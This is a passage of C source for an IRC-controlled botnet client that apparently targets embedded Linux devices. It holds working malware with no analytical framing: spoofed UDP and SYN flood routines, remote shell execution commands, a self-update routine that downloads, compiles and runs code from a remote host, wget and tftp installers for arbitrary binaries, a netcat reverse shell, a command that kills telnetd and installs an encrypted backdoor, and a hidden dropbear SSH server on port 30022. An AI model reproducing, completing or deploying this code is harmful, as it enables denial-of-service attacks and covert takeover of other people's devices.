  734. target = host2ip(sender,argv[1]);
  735. port = atoi(argv[2]);
  736. secs = atol(argv[3]);
  737. ip=(void*)buf;
  738. udp=(void*)(buf+sizeof(struct iphdr));
  739. str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr));
  740. memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr)));
  741. Send(sock,"NOTICE %s :Packeting %s.\n",sender,argv[1]);
  742. ip->ihl = 5;
  743. ip->version = 4;
  744. ip->tos = 0;
  745. ip->tot_len = 1500;
  746. ip->frag_off = 0;
  747. ip->protocol = 17;
  748. ip->ttl = 64;
  749. ip->daddr = target;
  750. udp->len = htons(psize);
  751. s_in.sin_family = AF_INET;
  752. s_in.sin_addr.s_addr = target;
  753. for (;;) {
  754. udp->source = rand();
  755. if (port) udp->dest = htons(port);
  756. else udp->dest = rand();
  757. udp->check = in_cksum((u_short *)buf,1500);
  758. ip->saddr = getspoof();
  759. ip->id = rand();
  760. ip->check = in_cksum((u_short *)buf,1500);
  761. s_in.sin_port = udp->dest;
  762. sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in));
  763. if (i >= 50) {
  764. if (time(NULL) >= start+secs) exit(0);
  765. i=0;
  766. }
  767. i++;
  768. }
  769. }
  770. void pan(int sock, char *sender, int argc, char **argv) {
  771. struct send_tcp send_tcp;
  772. struct pseudo_header pseudo_header;
  773. struct sockaddr_in sin;
  774. unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
  775. unsigned int psize=20, source, dest, check;
  776. unsigned long saddr, daddr,secs;
  777. int get;
  778. time_t start=time(NULL);
  779. if (mfork(sender) != 0) return;
  780. if (argc < 3) {
  781. Send(sock,"NOTICE %s :PAN <target> <port> <secs>\n",sender);
  782. exit(1);
  783. }
  784. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  785. {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
  786. daddr=host2ip(sender,argv[1]);
  787. secs=atol(argv[3]);
  788. Send(sock,"NOTICE %s :Panning %s.\n",sender,argv[1]);
  789. send_tcp.ip.ihl = 5;
  790. send_tcp.ip.version = 4;
  791. send_tcp.ip.tos = 16;
  792. send_tcp.ip.frag_off = 64;
  793. send_tcp.ip.ttl = 64;
  794. send_tcp.ip.protocol = 6;
  795. send_tcp.tcp.ack_seq = 0;
  796. send_tcp.tcp.doff = 10;
  797. send_tcp.tcp.res1 = 0;
  798. send_tcp.tcp.cwr = 0;
  799. send_tcp.tcp.ece = 0;
  800. send_tcp.tcp.urg = 0;
  801. send_tcp.tcp.ack = 0;
  802. send_tcp.tcp.psh = 0;
  803. send_tcp.tcp.rst = 0;
  804. send_tcp.tcp.fin = 0;
  805. send_tcp.tcp.syn = 1;
  806. send_tcp.tcp.window = 30845;
  807. send_tcp.tcp.urg_ptr = 0;
  808. dest=htons(atoi(argv[2]));
  809. while(1) {
  810. source=rand();
  811. if (atoi(argv[2]) == 0) dest=rand();
  812. saddr=getspoof();
  813. send_tcp.ip.tot_len = htons(40+psize);
  814. send_tcp.ip.id = rand();
  815. send_tcp.ip.saddr = saddr;
  816. send_tcp.ip.daddr = daddr;
  817. send_tcp.ip.check = 0;
  818. send_tcp.tcp.source = source;
  819. send_tcp.tcp.dest = dest;
  820. send_tcp.tcp.seq = rand();
  821. send_tcp.tcp.check = 0;
  822. sin.sin_family = AF_INET;
  823. sin.sin_port = dest;
  824. sin.sin_addr.s_addr = send_tcp.ip.daddr;
  825. send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
  826. check = rand();
  827. send_tcp.buf[9]=((char*)&check)[0];
  828. send_tcp.buf[10]=((char*)&check)[1];
  829. send_tcp.buf[11]=((char*)&check)[2];
  830. send_tcp.buf[12]=((char*)&check)[3];
  831. pseudo_header.source_address = send_tcp.ip.saddr;
  832. pseudo_header.dest_address = send_tcp.ip.daddr;
  833. pseudo_header.placeholder = 0;
  834. pseudo_header.protocol = IPPROTO_TCP;
  835. pseudo_header.tcp_length = htons(20+psize);
  836. bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  837. bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
  838. send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
  839. sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
  840. if (a >= 50) {
  841. if (time(NULL) >= start+secs) exit(0);
  842. a=0;
  843. }
  844. a++;
  845. }
  846. close(get);
  847. exit(0);
  848. }
  849.  
  850. void unknown(int sock, char *sender, int argc, char **argv) {
  851. int flag=1,fd,i;
  852. unsigned long secs;
  853. char *buf=(char*)malloc(9216);
  854. struct hostent *hp;
  855. struct sockaddr_in in;
  856. time_t start=time(NULL);
  857. if (mfork(sender) != 0) return;
  858. if (argc < 2) {
  859. Send(sock,"NOTICE %s :UNKNOWN <target> <secs>\n",sender);
  860. exit(1);
  861. }
  862. secs=atol(argv[2]);
  863. memset((void*)&in,0,sizeof(struct sockaddr_in));
  864. in.sin_addr.s_addr=host2ip(sender,argv[1]);
  865. in.sin_family = AF_INET;
  866. Send(sock,"NOTICE %s :Unknowning %s.\n",sender,argv[1]);
  867. while(1) {
  868. in.sin_port = rand();
  869. if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
  870. else {
  871. flag=1;
  872. ioctl(fd,FIONBIO,&flag);
  873. sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
  874. close(fd);
  875. }
  876. if (i >= 50) {
  877. if (time(NULL) >= start+secs) break;
  878. i=0;
  879. }
  880. i++;
  881. }
  882. close(fd);
  883. exit(0);
  884. }
  885.  
  886. void update(int sock, char *sender, int argc, char **argv) {
  887. int sock2,i,d;
  888. struct sockaddr_in server;
  889. unsigned long ipaddr;
  890. unsigned char dgcc;
  891. char buf[1024], *file;
  892. FILE *gcc;
  893. int parent=getpid();
  894. if (mfork(sender) != 0) return;
  895. if (argc < 2) {
  896. Send(sock,"NOTICE %s :UPDATEHTTP <host> <src:bin>\n",sender);
  897. exit(0);
  898. }
  899. if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  900. Send(sock,"NOTICE %s :Unable to create socket (Wierd, you shouldnt get this error and ITS NOT MY FAULT!).\n",sender);
  901. exit(0);
  902. }
  903. server.sin_family = AF_INET;
  904. server.sin_port = htons(80);
  905. if ((ipaddr = inet_addr(argv[1])) == -1) {
  906. struct hostent *hostm;
  907. if ((hostm=gethostbyname(argv[1])) == NULL) {
  908. Send(sock,"NOTICE %s :Unable to resolve address.\n",sender);
  909. exit(0);
  910. }
  911. memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
  912. }
  913. else server.sin_addr.s_addr = ipaddr;
  914. memset(&(server.sin_zero), 0, 8);
  915. if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
  916. Send(sock,"NOTICE %s :Unable to connect to http.\n",sender);
  917. exit(0);
  918. }
  919.  
  920. gcc=popen("gcc --help","r");
  921. if (gcc != NULL) {
  922. memset(buf,0,1024);
  923. fgets(buf,1024,gcc);
  924. if (!strstr(buf,"Usage")) dgcc=0;
  925. else dgcc=1;
  926. pclose(gcc);
  927. } else dgcc=0;
  928.  
  929. for (i=0;i<strlen(argv[2]) && argv[2][i] != ':';i++);
  930. argv[2][i]=0;
  931. if (dgcc) file=argv[2];
  932. else file=argv[2]+i+1;
  933.  
  934. Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",file,argv[1]);
  935. Send(sock,"NOTICE %s :Receiving update.\n",sender);
  936. system("mkdir /tmp");
  937. if (dgcc) {
  938. FILE *file=fopen("/tmp/.c","wb");
  939. char bufm[4096];
  940. while(1) {
  941. int i;
  942. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  943. if (i < 4096) bufm[i]=0;
  944. for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
  945. for (d+=4;d<i;d++) fputc(bufm[d],file);
  946. goto done;
  947. }
  948. }
  949. done:
  950. while(1) {
  951. int i;
  952. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  953. if (i < 4096) bufm[i]=0;
  954. for (d=0;d<i;d++) fputc(bufm[d],file);
  955. }
  956. fclose(file);
  957. memset(buf,0,4096);
  958. sprintf(buf,"(gcc -o %s /tmp/.c; rm -rf /tmp/.c; kill -9 %d; %s &) > /dev/null 2>&1",execfile,parent,execfile);
  959. }
  960. else {
  961. FILE *file=fopen("/tmp/.o","wb");
  962. unsigned char bufm[4096];
  963. while(1) {
  964. int i;
  965. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  966. if (i < 4096) bufm[i]=0;
  967. for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
  968. for (d+=4;d<i;d++) fputc(bufm[d],file);
  969. goto done2;
  970. }
  971. }
  972. done2:
  973. while(1) {
  974. int i,d;
  975. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  976. if (i < 4096) bufm[i]=0;
  977. for (d=0;d<i;d++) fputc(bufm[d],file);
  978. }
  979. fclose(file);
  980. memset(buf,0,4096);
  981. //sprintf(buf,"(chmod 755 /tmp/.o;kill -9 %d; kill -9 %d;trap '' 1 2; /tmp/.o &) > /dev/null",actualparent,parent,execfile);
  982. //sprintf(buf,"chmod +x /tmp/.o; trap '' 1;sh -c '/var/bin/killall knight*;/var/bin/killall .o;sleep 5;trap \"\" 1;/tmp/.o '&");
  983. sprintf(buf,"export PATH=/usr/sbin:/bin:/usr/bin:/sbin:/var/bin;chmod +x /tmp/.o; trap '' 1;sh -c '/var/bin/killall knight*;/var/bin/killall kt*;/var/bin/killall .o;/var/bin/sleep 5;trap "" 1;/tmp/.o '&");
  984. }
  985. close(sock);
  986. close(sock2);
  987. system(buf);
  988. kill(9,0);
  989. exit(0);
  990. }
  991.  
  992.  
  993. void move(int sock, char *sender, int argc, char **argv) {
  994. if (argc < 1) {
  995. Send(sock,"NOTICE %s :MOVE <server>\n",sender);
  996. exit(1);
  997. }
  998. server=strdup(argv[1]);
  999. changeservers=1;
  1000. close(sock);
  1001. }
  1002.  
  1003. void hackpkg(int sock, char *sender, int argc, char **argv) {
  1004. int sock2,i,d;
  1005. struct sockaddr_in server;
  1006. unsigned long ipaddr;
  1007. char buf[1024];
  1008. FILE *file;
  1009. mkdir("/var/bin", 0775);
  1010. unsigned char bufm[4096];
  1011. if (mfork(sender) != 0) return;
  1012. if (argc < 2) {
  1013. Send(sock,"NOTICE %s :HACKPGK <url> <binary name>\n",sender);
  1014. exit(0);
  1015. }
  1016. if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  1017. Send(sock,"NOTICE %s :Unable to create socket.\n",sender);
  1018. exit(0);
  1019. }
  1020. if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
  1021. else strcpy(buf,argv[1]);
  1022. for (i=0;i<strlen(buf) && buf[i] != '/';i++);
  1023. buf[i]=0;
  1024. server.sin_family = AF_INET;
  1025. server.sin_port = htons(80);
  1026. if ((ipaddr = inet_addr(buf)) == -1) {
  1027. struct hostent *hostm;
  1028. if ((hostm=gethostbyname(buf)) == NULL) {
  1029. Send(sock,"NOTICE %s :Unable to resolve address.\n",sender);
  1030. exit(0);
  1031. }
  1032. memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
  1033. }
  1034. else server.sin_addr.s_addr = ipaddr;
  1035. memset(&(server.sin_zero), 0, 8);
  1036. if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
  1037. Send(sock,"NOTICE %s :Unable to connect to http.\n",sender);
  1038. exit(0);
  1039. }
  1040.  
  1041. Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: HackZilla/1.67 [en] (X11; U; Linux 2.2.16-3 x64)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
  1042. Send(sock,"NOTICE %s :Receiving file.\n",sender);
  1043. file=fopen(argv[2],"wb");
  1044. while(1) {
  1045. int i;
  1046. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  1047. if (i < 4096) bufm[i]=0;
  1048. for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
  1049. for (d+=4;d<i;d++) fputc(bufm[d],file);
  1050. goto done;
  1051. }
  1052. }
  1053. done:
  1054. Send(sock,"NOTICE %s :Installed %s to hack path.\n",sender,argv[2]);
  1055. while(1) {
  1056. int i,d;
  1057. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  1058. if (i < 4096) bufm[i]=0;
  1059. for (d=0;d<i;d++) fputc(bufm[d],file);
  1060. }
  1061. fclose(file);
  1062. close(sock2);
  1063. char MoveIt[255];
  1064. sprintf(MoveIt, "cat %s > /var/bin/%s",argv[2],argv[2]);
  1065. system(MoveIt);
  1066. char DeleteIt[255];
  1067. sprintf(DeleteIt, "rm %s",argv[2],argv[2]);
  1068. system(DeleteIt);
  1069. char String[255];
  1070. sprintf(String, "chmod 775 /var/bin/%s",argv[2]);
  1071. system(String);
  1072. char String2[255];
  1073. sprintf(String2, "ls -l /var/bin/%s",argv[2]);
  1074. system(String2);
  1075. exit(0);
  1076. }
  1077.  
  1078. void help(int sock, char *sender, int argc, char **argv) {
  1079. if (mfork(sender) != 0) return;
  1080. Send(sock,"NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers\n",sender); sleep(1);
  1081. Send(sock,"NOTICE %s :UDP <target> <port> <secs> = A udp flooder\n",sender); sleep(1);
  1082. Send(sock,"NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder\n",sender); sleep(1);
  1083. Send(sock,"NOTICE %s :HTTPFLOOD <url> <secs>\n",sender); sleep(1);
  1084. Send(sock,"NOTICE %s :NTP <target> <ntp server> <secs>\n",sender); sleep(1);
  1085. Send(sock,"NOTICE %s :BLACKNURSE <target ip> <secs>\n",sender); sleep(1);
  1086. Send(sock,"NOTICE %s :NICK <nick> = Changes the nick of the client\n",sender); sleep(1);
  1087. Send(sock,"NOTICE %s :SERVER <server> = Changes servers\n",sender); sleep(1);
  1088. Send(sock,"NOTICE %s :GETSPOOFS = Gets the current spoofing\n",sender); sleep(1);
  1089. Send(sock,"NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet\n",sender); sleep(1);
  1090.  
  1091. Send(sock,"NOTICE %s :DISABLE = Disables all packeting from this client\n",sender); sleep(1);
  1092. Send(sock,"NOTICE %s :ENABLE = Enables all packeting from this client\n",sender); sleep(1);
  1093.  
  1094. Send(sock,"NOTICE %s :KILL = Kills the client\n",sender); sleep(1);
  1095. Send(sock,"NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd\n",sender); sleep(1);
  1096. Send(sock,"NOTICE %s :UPDATE <http address> <src:bin> = Update this bot\n",sender); sleep(1);
  1097. Send(sock,"NOTICE %s :HACKPKG <http address> <bin name> = HackPkg is here! Install a bin, using http, no depends!\n",sender); sleep(1);
  1098. Send(sock,"NOTICE %s :VERSION = Requests version of client\n",sender); sleep(1);
  1099. Send(sock,"NOTICE %s :KILLALL = Kills all current packeting\n",sender); sleep(1);
  1100. Send(sock,"NOTICE %s :HELP = Displays this\n",sender); sleep(1);
  1101.  
  1102. Send(sock,"NOTICE %s :IRC <command> = Sends this command to the server\n",sender); sleep(1);
  1103. Send(sock,"NOTICE %s :SH <command> = Executes a command\n",sender); sleep(1);
  1104. Send(sock,"NOTICE %s :ISH <command> = SH, interactive, sends to channel\n",sender); sleep(1);
  1105. Send(sock,"NOTICE %s :SHD <command> = Executes a psuedo-daemonized command\n",sender); sleep(1);
  1106. Send(sock,"NOTICE %s :GETBB <tftp server> = Get a proper busybox\n",sender); sleep(1);
  1107.  
  1108. Send(sock,"NOTICE %s :INSTALL <http server/file_name> = Download & install a binary to /var/bin \n",sender); sleep(1);
  1109. Send(sock,"NOTICE %s :BASH <cmd> = Execute commands using bash. \n",sender); sleep(1);
  1110. Send(sock,"NOTICE %s :BINUPDATE <http:server/package> = Update a binary in /var/bin via wget \n",sender); sleep(1);
  1111. Send(sock,"NOTICE %s :SCAN <nmap options> = Call the nmap wrapper script and scan with your opts. \n",sender); sleep(1);
  1112. Send(sock,"NOTICE %s :RSHELL <server> <port> = Equates to nohup nc ip port -e /bin/sh\n",sender); sleep(1);
  1113. Send(sock,"NOTICE %s :LOCKUP <http:server> = Kill telnet, d/l aes backdoor from <server>, run that instead.\n",sender); sleep(1);
  1114. Send(sock,"NOTICE %s :GETSSH <http:server/dropbearmulti> = D/l, install, configure and start dropbear on port 30022.\n",sender); sleep(1);
  1115. exit(0);
  1116. }
  1117. void killall(int sock, char *sender, int argc, char **argv) {
  1118. unsigned long i;
  1119. for (i=0;i<numpids;i++) {
  1120. if (pids[i] != 0 && pids[i] != getpid()) {
  1121. if (sender) Send(sock,"NOTICE %s :Killing pid %d.\n",sender,pids[i]);
  1122. kill(pids[i],9);
  1123. }
  1124. }
  1125. }
  1126.  
  1127. void killd(int sock, char *sender, int argc, char **argv) {
  1128. char buf[1024]={0};
  1129. if (disabled == 1) return;
  1130. sprintf(buf,"kill -9 %d;kill -9 0",actualparent);
  1131. system(buf);
  1132. exit(0);
  1133.  
  1134. }
  1135. struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
  1136. { "PAN", pan },
  1137. { "UDP", udp },
  1138. { "UNKNOWN", unknown },
  1139. {"HTTPFLOOD", sendHTTP },
  1140. {"NTP", ntp },
  1141. {"BLACKNURSE", blacknurse },
  1142. { "NICK", nickc },
  1143. { "SERVER", move },
  1144. { "GETSPOOFS", getspoofs },
  1145. { "SPOOFS", spoof },
  1146. { "HACKPKG", hackpkg },
  1147. { "DISABLE", disable },
  1148. { "ENABLE", enable },
  1149. { "UPDATE", update },
  1150. { "KILL", killd },
  1151. { "GET", get },
  1152. { "VERSION", version },
  1153. { "KILLALL", killall },
  1154. { "HELP", help },
  1155. { (char *)0, (void (*)(int,char *,int,char **))0 } };
  1156. void _PRIVMSG(int sock, char *sender, char *str) {
  1157. int i;
  1158. char *to, *message;
  1159. for (i=0;i<strlen(str) && str[i] != ' ';i++);
  1160. str[i]=0;
  1161. to=str;
  1162. message=str+i+2;
  1163. for (i=0;i<strlen(sender) && sender[i] != '!';i++);
  1164. sender[i]=0;
  1165. if (*message == '!' && !strcasecmp(to,chan)) {
  1166. char *params[12], name[1024]={0};
  1167. int num_params=0, m;
  1168. message++;
  1169. for (i=0;i<strlen(message) && message[i] != ' ';i++);
  1170. message[i]=0;
  1171. if (strwildmatch(message,nick)) return;
  1172. message+=i+1;
  1173. if (!strncmp(message,"IRC ",4)) if (disabled) Send(sock,"NOTICE %s :Unable to comply.\n",sender); else Send(sock,"%s\n",message+4);
  1174. if (!strncmp(message,"SH ",3)) {
  1175. char buf[1024];
  1176. FILE *command;
  1177. if (mfork(sender) != 0) return;
  1178. memset(buf,0,1024);
  1179. sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3);
  1180. command=popen(buf,"r");
  1181. while(!feof(command)) {
  1182. memset(buf,0,1024);
  1183. fgets(buf,1024,command);
  1184. Send(sock,"NOTICE %s :%s\n",sender,buf);
  1185. sleep(1);
  1186. }
  1187. pclose(command);
  1188. exit(0);
  1189. }
  1190.  
  1191.  
  1192. // SHD (daemonize sh command)
  1193. if (!strncmp(message,"SHD ",4)) {
  1194. char buf[1024];
  1195. FILE *command;
  1196. if (mfork(sender) != 0) return;
  1197. memset(buf,0,1024);
  1198. sprintf(buf,"export HOME=/tmp;export;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;trap '' 1 2; sh -c '%s'&",message+4);
  1199. command=popen(buf,"r");
  1200. while(!feof(command)) {
  1201. memset(buf,0,1024);
  1202. fgets(buf,1024,command);
  1203. Send(sock,"NOTICE %s :%s\n",sender,buf);
  1204. sleep(1);
  1205. }
  1206. pclose(command);
  1207. exit(0);
  1208. }
  1209.  
  1210. // GETBB (this installs a better busybox, via tftp. This func, like the rest, has a dependency that we would like eliminate (in this case tftp). We really want to have the c program handle as much of thse custom funcs as possile. I am not graet with c, but proficient with linux, so i added these.
  1211. if (!strncmp(message,"GETBB ",6)) {
  1212. char buf[1024];
  1213. FILE *command;
  1214. if (mfork(sender) != 0) return;
  1215. memset(buf,0,1024);
  1216. sprintf(buf,"export fileGet=busybox-mips;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;cd /var;(([ ! -e /var/\"$fileGet\" ] || [ ! -s /var/\"$fileGet\" ]) && tftp -g -r \"$fileGet\" %s && chmod +x \"$fileGet\" && ./\"$fileGet\" mkdir bin && ./\"$fileGet\" --install -s /var/bin && ls -l \"$fileGet\" || echo It appears we already have /var/\"$fileGet\")",message+6);
  1217. command=popen(buf,"r");
  1218. while(!feof(command)) {
  1219. memset(buf,0,1024);
  1220. fgets(buf,1024,command);
  1221. Send(sock,"NOTICE %s :%s\n",sender,buf);
  1222. sleep(1);
  1223. }
  1224. pclose(command);
  1225. exit(0);
  1226. }
  1227.  
  1228.  
  1229. // GETSSH (download, install, start dropbear, requires busybox for wget, mv, somet other things that are not always present on embedded devices
  1230. if (!strncmp(message,"GETSSH ",7)) {
  1231. char buf[1024];
  1232. FILE *command;
  1233. if (mfork(sender) != 0) return;
  1234. memset(buf,0,1024);
  1235. sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;cd /tmp;export url=%s;name=`echo \"$url\" | sed 's#.\x2a/##'` && wget -O \"$name\" \"$url\";chmod +x \"$name\";mv \"$name\" /var/bin;ls -l /var/bin/\"$name\" && dss=/var/dbs/dropbear_dss_host_key;rsa=/var/dbs/dropbear_rsa_host_key;ecd=/var/dbs/dropbear_ecdsa_host_key;cd /var/bin;for i in dropbear dbclient dropbearkey dropbearconvert;do ln -s /var/bin/dropbearmulti $i;done;[ ! -d /var/dbs ] && mkdir /var/dbs;[ -f $dss ] || dropbearkey -t dss -f $dss;[ -f $rsa ] || dropbearkey -t rsa -f $rsa;[ -f $ecd ] || dropbearkey -t ecdsa -f $ecd;dropbear -r $dss -r $rsa -r $ecd -p 30022;iptables -I INPUT 1 -p tcp --dport 30022 -j ACCEPT",message+7);
  1236. command=popen(buf,"r");
  1237. while(!feof(command)) {
  1238. memset(buf,0,1024);
  1239. fgets(buf,1024,command);
  1240. Send(sock,"NOTICE %s :%s\n",sender,buf);
  1241. sleep(1);
  1242. }
  1243. pclose(command);
  1244. exit(0);
  1245. }
  1246.  
  1247.  
  1248. // INSTALL (uses wget to download and install a file into our hack path. This program already has a built in http func, so it would be great to use taht instead of needing to download busybox/wget first
  1249.  
  1250. if (!strncmp(message,"INSTALL ",8)) {
  1251. char buf[1024];
  1252. FILE *command;
  1253. if (mfork(sender) != 0) return;
  1254. memset(buf,0,1024);
  1255. sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo \"$url\" | sed 's#.\x2a/##'`;(([ ! -e /var/bin/$name ] || [ ! -s /var/bin/$name ]) && echo \"$name either doesnt exist or eq 0 so we get\" && cd /tmp && wget -O \"$name\" \"$url\" && chmod +x \"$name\" && mv \"$name\" /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo \"It appears I already have $name\")",message+8);
  1256. command=popen(buf,"r");
  1257. while(!feof(command)) {
  1258. memset(buf,0,1024);
  1259. fgets(buf,1024,command);
  1260. Send(sock,"NOTICE %s :%s\n",sender,buf);
  1261. sleep(1);
  1262. }
  1263. pclose(command);
  1264. exit(0);
  1265. }
  1266.  
  1267.  
  1268. // BINUPDATE http://server/file (like install, but updates the program)
  1269.  
  1270. if (!strncmp(message,"BINUPDATE ",10)) {
  1271. char buf[1024];
  1272. FILE *command;
  1273. if (mfork(sender) != 0) return;
  1274. memset(buf,0,1024);
  1275. sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo \"$url\" | sed 's#.*/##'`;([ -e /var/bin/$name ]) && echo $name exists so we delete it... && rm /var/bin/$name && cd /tmp && wget -O $name $url && chmod +x $name && mv $name /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo \"$name doesnt exist, perhaps you mean INSTALL?\"",message+10);
  1276. command=popen(buf,"r");
  1277. while(!feof(command)) {
  1278. memset(buf,0,1024);
  1279. fgets(buf,1024,command);
  1280. Send(sock,"NOTICE %s :%s\n",sender,buf);
  1281. sleep(1);
  1282. }
  1283. pclose(command);
  1284. exit(0);
  1285. }
  1286.  
  1287. // LOCKUP <http:server/backdoor> (This kills telnet and installs my backdoor binary, which is aes encrypted. This is prob something else that would be cool to have built in to elimiate the dependency
  1288.  
  1289. if (!strncmp(message,"LOCKUP ",7)) {
  1290. char buf[1024];
  1291. FILE *command;
  1292. if (mfork(sender) != 0) return;
  1293. memset(buf,0,1024);
  1294. sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;export HOME=/tmp;[ ! -f /var/bin/dmips ] && cd /var/bin;wget -O dmips %s;chmod +x /var/bin/dmips;(killall -9 telnetd || kill -9 telnetd) && (nohup dmips || trap '' 1 2 /var/bin/dmips)",message+7);
  1295. command=popen(buf,"r");
  1296. while(!feof(command)) {
  1297. memset(buf,0,1024);
  1298. fgets(buf,1024,command);
  1299. Send(sock,"NOTICE %s :%s\n",sender,buf);
  1300. sleep(1);
  1301. }
  1302. pclose(command);
  1303. exit(0);
  1304. }
  1305.  
  1306. // !* RSHELL server.com 4444 (reverse shell via nc. We need a built in reverese shell functiomn to eliminiate taht dependency
  1307. if (!strncmp(message,"RSHELL ",6)) {
  1308. char buf[1024];
  1309. FILE *command;
  1310. if (mfork(sender) != 0) return;
  1311. memset(buf,0,1024);
  1312. sprintf(buf,"export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;trap '' 1 2; sh -c 'nohup nc %s -e /bin/sh '&",message+6);
  1313. command=popen(buf,"r");
  1314. while(!feof(command)) {
  1315. memset(buf,0,1024);
  1316. fgets(buf,1024,command);
  1317. Send(sock,"NOTICE %s :%s\n",sender,buf);
  1318. sleep(1);
  1319. }
  1320. pclose(command);
  1321. exit(0);
  1322. }
  1323.  
  1324. //SCAN (calls a wrapper script. We need a built in port scanner that auto uploads the results to a server
  1325. if (!strncmp(message,"SCAN ",5)) {
  1326. char buf[1024];
  1327. FILE *command;
  1328. if (mfork(sender) != 0) return;
  1329. memset(buf,0,1024);
  1330. sprintf(buf,"export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;(([ ! -x /var/bin/scan ] || [ ! -x /var/bin/nmap ]) && echo \"I am missing either scan or nmap, and Shellzrus was on Xanax when he wrote this, so you need to do INSTALL http:\x2f\server/nmap and INSTALL http:\x2f\x2fserver/scan first...\" && ([ -f /var/bin/nmap ] && ls -l /var/bin/nmap) && ([ -f /va\x72/bin/scan ] && ls -l /var/bin/scan) || scan %s)",message+5);
  1331. command=popen(buf,"r");
  1332. while(!feof(command)) {
  1333. memset(buf,0,1024);
  1334. fgets(buf,1024,command);
  1335. Send(sock,"NOTICE %s :%s\n",sender,buf);
  1336. sleep(1);
  1337. }
  1338. pclose(command);
  1339. exit(0);
  1340. }
  1341.  
  1342. // !* BASH echo hello
  1343. if (!strncmp(message,"BASH ",5)) {
  1344. char buf[1024];
  1345. FILE *command;
  1346. if (mfork(sender) != 0) return;
  1347. memset(buf,0,1024);
  1348. sprintf(buf,"export HOME=/tmp;export SHELL=/var/bin/bash;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;%s",message+5);
  1349. command=popen(buf,"r");
  1350. while(!feof(command)) {
  1351. memset(buf,0,1024);
  1352. fgets(buf,1024,command);
  1353. Send(sock,"NOTICE %s :%s\n",sender,buf);
  1354. sleep(1);
  1355. }
  1356. pclose(command);
  1357. exit(0);
  1358.  
  1359. }
  1360.  
  1361. m=strlen(message);
  1362. for (i=0;i<m;i++) {
  1363. if (*message == ' ' || *message == 0) break;
  1364. name[i]=*message;
  1365. message++;
  1366. }
  1367. for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++;
  1368. num_params++;
  1369. if (num_params > 10) num_params=10;
  1370. params[0]=name;
  1371. params[num_params+1]="\0";
  1372. m=1;
  1373. while (*message != 0) {
  1374. message++;
  1375. if (m >= num_params) break;
  1376. for (i=0;i<strlen(message) && message[i] != ' ';i++);
  1377. params[m]=(char*)malloc(i+1);
  1378. strncpy(params[m],message,i);
  1379. params[m][i]=0;
  1380. m++;
  1381. message+=i;
  1382. }
  1383. for (m=0; flooders[m].cmd != (char *)0; m++) {
  1384. if (!strcasecmp(flooders[m].cmd,name)) {
  1385. flooders[m].func(sock,sender,num_params-1,params);
  1386. for (i=1;i<num_params;i++) free(params[i]);
  1387. return;
  1388. }
  1389. }
  1390. }
  1391. }
